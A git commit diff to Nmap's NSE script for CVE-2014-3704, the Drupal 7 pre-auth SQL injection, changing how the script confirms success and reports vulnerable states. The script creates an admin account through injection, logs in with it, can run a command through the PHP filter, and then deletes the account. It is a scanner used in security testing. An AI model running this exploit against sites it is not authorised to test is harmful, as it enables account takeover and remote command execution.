Improves detection of cve-2014-3704. Fixes #902. Closes #905.

2025-12-06 04:31:29 +00:00 · 2017-07-08 03:11:45 +00:00
parent d1e8388b7e
commit 30f0fab5bc
1 changed files with 44 additions and 29 deletions
--- a/scripts/http-vuln-cve2014-3704.nse
+++ b/scripts/http-vuln-cve2014-3704.nse
@@ -216,9 +216,11 @@ local function do_sql_query(host, port, uri, user)
    }
  }
  local res = http.post(host, port, uri .. "?q=/user/login", opt, nil, r)
-  --TODO: Check return status

-  return user, passwd
+  if string.match(res.body, "includes[\\/]database[\\/]database%.inc") and string.match(res.body, "addcslashes%(%)") then
+    return user, passwd
+  end
+
 end

 local function set_php_filter(host, port, uri, session, disable)
@@ -342,9 +344,37 @@ action = function(host, port)
    cleanup = "false"
  end

+  local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
+  local vuln = {
+    title = 'Drupal - pre Auth SQL Injection Vulnerability',
+    state = vulns.STATE.NOT_VULN,
+    description = [[
+  The expandArguments function in the database abstraction API in
+  Drupal core 7.x before 7.32 does not properly construct prepared
+  statements, which allows remote attackers to conduct SQL injection
+  attacks via an array containing crafted keys.
+    ]],
+    IDS = {CVE = 'CVE-2014-3704'},
+    references = {
+      'https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html',
+      'https://www.drupal.org/SA-CORE-2014-005',
+      'http://www.securityfocus.com/bid/70595',
+    },
+    dates = {
+      disclosure = {year = '2014', month = '10', day = '15'},
+    },
+  }
+
  local user, passwd = do_sql_query(host, port, uri, nil)

+  if user == nil or passwd == nil then
+    return vulnReport:make_output(vuln)
+  end
+
  stdnse.debug(1, string.format("logging in as admin user (username: '%s'; passwd: '%s')", user, passwd))
+
+  vuln.state = vulns.STATE.EXPLOIT
+
  local data = {
    ['name'] = user,
    ['pass'] = passwd,
@@ -355,28 +385,8 @@ action = function(host, port)
  local res = http.post(host, port, uri .. "?q=/user/login", nil, nil, data)

  if res.status == 302 and res.cookies[1].name ~= nil then
-    local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
-    local vuln = {
-      title = 'Drupal - pre Auth SQL Injection Vulnerability',
-      state = vulns.STATE.NOT_VULN,
-      description = [[
-The expandArguments function in the database abstraction API in
-Drupal core 7.x before 7.32 does not properly construct prepared
-statements, which allows remote attackers to conduct SQL injection
-attacks via an array containing crafted keys.
-      ]],
-      IDS = {CVE = 'CVE-2014-3704'},
-      references = {
-        'https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html',
-        'https://www.drupal.org/SA-CORE-2014-005',
-        'http://www.securityfocus.com/bid/70595',
-      },
-      dates = {
-        disclosure = {year = '2014', month = '10', day = '15'},
-      },
-    }
+
    stdnse.debug(1, string.format("logged in as admin user (username: '%s'; passwd: '%s'). Target is vulnerable.", user, passwd))
-    vuln.state = vulns.STATE.EXPLOIT

    if cmd ~= nil then
      local session = {}
@@ -406,11 +416,16 @@ attacks via an array containing crafted keys.
      end
    end

-    -- cleanup: remove admin user
-    if cleanup == nil then
-      do_sql_query(host, port, uri, user)
-    end
-
-    return vulnReport:make_output(vuln)
+  else
+    vuln.state = vulns.STATE.LIKELY_VULN
+    vuln.check_results = "Account created but unable to log in."
  end
+
+  -- cleanup: remove admin user
+  if cleanup == nil then
+    do_sql_query(host, port, uri, user)
+  end
+
+  return vulnReport:make_output(vuln)
+
 end